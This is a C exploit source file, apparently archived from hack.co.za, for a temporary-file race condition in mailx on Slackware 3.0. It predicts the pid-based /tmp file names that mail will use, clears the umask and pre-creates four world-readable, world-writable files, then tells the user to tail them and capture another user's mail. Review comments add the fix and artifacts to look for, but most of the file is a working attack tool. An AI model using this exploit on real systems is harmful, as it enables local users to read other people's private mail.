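/*
 * This program creates temporary files used by mailx (/bin/mail under
 * Slackware 3.0), which can then be read by the program.  This will exploit
 * 4 of the 5 temporary files, the final temporary file is a tighter race
 * condition, and is not handled by this code.
 *
 * Following execution of this program with the process id of mail that is
 * running, execute 'tail -f /tmp/R*', redirecting to a file if desired, and
 * allow it to run until the mail process has exited.  This can be easily
 * handled in a shell script, but is not included since it is not needed to
 * sufficiently demonstrate the security flaw.
 *
 * Dave M. (davem@cmu.edu)
 */

/*
 * Review notes
 *
 * Weakness shown: temporary file names in the shared /tmp directory that are
 * derived from the process id, so another local user can compute them in
 * advance.  Pre-creating them only has an effect if mail then opens the
 * already existing file, i.e. does not insist on exclusive creation.
 *
 * Fix on the mail side: create temporary files with mkstemp(), or with
 * open(O_CREAT | O_EXCL) and mode 0600, or place them in a per-user
 * directory, so a file planted by someone else makes the open fail.
 *
 * Artifact to look for: /tmp/Re, /tmp/Rs, /tmp/Rq and /tmp/Rm followed by
 * 'a' and pid digits, mode 0666, present before the mail process with that
 * pid creates them (presumably owned by a different user; verify on the
 * host).
 *
 * The header names after each #include were lost when this page was
 * extracted; the list below is the set the calls in this file need.
 */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

enum {
    PID_FIELD_WIDTH = 6,  /* pid is left-padded with '0' to this width */
    NUM_FILES = 4,        /* the fifth temporary file is not handled */
    NAME_BUF_SIZE = 80
};

/**
 * Build the temporary file name expected for a given process id.
 *
 * The result is `prepend`, then `pid` left-padded with '0' to six
 * characters, with the first character after the prefix overwritten by 'a'.
 * ("/tmp/Re", "123") gives "/tmp/Rea00123".  A six-digit pid loses its
 * leading digit to the 'a'; a longer pid is appended unpadded.
 *
 * @param dest    output buffer; the caller must provide at least
 *                strlen(prepend) + max(6, strlen(pid)) + 1 bytes, since no
 *                size is passed in
 * @param prepend path prefix, copied verbatim
 * @param pid     process id as a decimal string
 */
void exploit_mktemp(char *dest, const char *prepend, const char *pid)
{
    size_t prefix_len = strlen(prepend);
    size_t pid_len = strlen(pid);
    char *out = dest + prefix_len;

    memcpy(dest, prepend, prefix_len);
    for (size_t i = pid_len; i < PID_FIELD_WIDTH; i++)
        *out++ = '0';
    memcpy(out, pid, pid_len + 1);  /* +1 copies the terminating NUL */

    /* The letter takes the place of the first character of the pid field. */
    dest[prefix_len] = 'a';
}

/**
 * Create the four predicted temporary files for the mail process whose pid
 * is given as argv[1].
 *
 * @return -1 on a usage or argument error, 1 if any file could not be
 *         created, 0 otherwise
 */
int main(int argc, char **argv)
{
    static const char *const prefixes[NUM_FILES] = {
        "/tmp/Re", "/tmp/Rs", "/tmp/Rq", "/tmp/Rm"
    };
    const mode_t world_rw =
        S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH;
    char tmpf[NUM_FILES][NAME_BUF_SIZE];  /* hold filename */
    int rc = 0;

    if (argc < 2) {
        printf("mailbug racer\nSyntax: %s process-id\n", argv[0]);
        return -1;
    }

    /*
     * Accept decimal digits only: anything else (a '/' for instance) would
     * make the program create files outside the /tmp/R* names it documents,
     * and an over-long argument would overrun the fixed-size name buffers.
     */
    size_t pid_len = strlen(argv[1]);
    size_t field_len = pid_len < PID_FIELD_WIDTH ? PID_FIELD_WIDTH : pid_len;
    if (pid_len == 0 || strspn(argv[1], "0123456789") != pid_len) {
        fprintf(stderr, "%s: process-id must be a decimal number\n", argv[0]);
        return -1;
    }

    /* get mktemp filenames */
    for (size_t i = 0; i < NUM_FILES; i++) {
        if (strlen(prefixes[i]) + field_len + 1 > sizeof tmpf[i]) {
            fprintf(stderr, "%s: process-id is too long\n", argv[0]);
            return -1;
        }
        exploit_mktemp(tmpf[i], prefixes[i], argv[1]);
    }

    /* Clear the umask so the mode passed to creat() is applied unmodified. */
    umask(0);

    /* create temporary files */
    for (size_t i = 0; i < NUM_FILES; i++) {
        int fd = creat(tmpf[i], world_rw);
        if (fd < 0) {
            perror(tmpf[i]);
            rc = 1;
            continue;
        }
        close(fd);
    }

    return rc;
}

/* www.hack.co.za [2000]*/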